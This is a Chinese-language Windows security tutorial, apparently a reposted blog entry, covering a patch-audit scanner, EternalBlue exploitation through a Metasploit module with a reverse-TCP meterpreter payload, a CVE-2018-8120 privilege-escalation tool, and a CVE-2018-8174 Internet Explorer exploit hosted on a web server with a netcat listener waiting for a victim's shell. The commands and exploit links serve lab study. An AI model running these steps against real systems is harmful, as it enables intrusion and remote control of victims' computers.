系统安全Windows远程执行&权限提升&组件溢出

Posted 遗憾zzz

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了系统安全Windows远程执行&权限提升&组件溢出相关的知识,希望对你有一定的参考价值。

一、探针-工具-本地自检&远程探针

WindowsVulnScan
这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。

本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。

工具地址:https://github.com/chroblert/WindowsVulnScan

1. 首先运行powershell脚本KBCollect.ps收集一些信息

.\\KBCollect.ps1
2.运行cve-check.py -U更新CVEKB数据库中的hasPOC字段
3.运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下:


PS:如果运行错误,需要将生成的KB.json进行编码转换UTF-8
WindowsVulnScan这一款工具适合本地自检 蓝队

二、远程-永恒之蓝-CVE-2017-0146

永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

可以先用Nessus 远程探针 红队,对主机的漏洞进行扫描,发现存在漏洞即可利用
MS17-010可以参考我写的:
https://blog.csdn.net/qq_36241198/article/details/119830915

这里就不作演示了

MSF自带测试EXP

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost x.x.x.x
set lhost x.x.x.x
exploit

三、本地-权限提升-CVE-2018-8120

漏洞描述
部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码

影响版本

Windows 7 for 32-bit Systems Service Pack 1   
Windows 7 for x64-based Systems Service Pack 1      
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1

工具地址:https://github.com/alpha1ab/CVE-2018-8120


直接CVE-2018-8120.exe “whoami” 提升到系统权限

也可以用msf提取参考:https://blog.csdn.net/qq_46258964/article/details/109066126

四、组件-IE&Office-CVE-2018-8174

漏洞简介
该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。

CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞

漏洞复现
exp地址:https://github.com/Yt1g3r/CVE-2018-8174_EXP

python2 CVE-2018-8174.py -u http://192.168.111.130/exploit.html -o msf.trf -i 192.168.111.130 -p 4444


生成一个漏洞的html文件绑定在4444端口

cp exploit.html /var/www/html
service apache2 start
nc -lvvp 4444

当受害者在windows7下访问http://192.168.111.130/exploit.html,就成功钓鱼上当,返回一个cmd命令shell




以上是关于系统安全Windows远程执行&权限提升&组件溢出的主要内容,如果未能解决你的问题,请参考以下文章

《内网安全攻防:渗透测试实战指南》读书笔记:权限提升分析及防御

《内网安全攻防:渗透测试实战指南》读书笔记:权限提升分析及防御

CVE-2020-0796——SMBV3客户端/服务端远程代码执行漏洞(远程代码执行+权限提升)

Windows权限维持——计划任务

如何提升windows7的权限

Windows特权提升漏洞(CVE-2021-36934)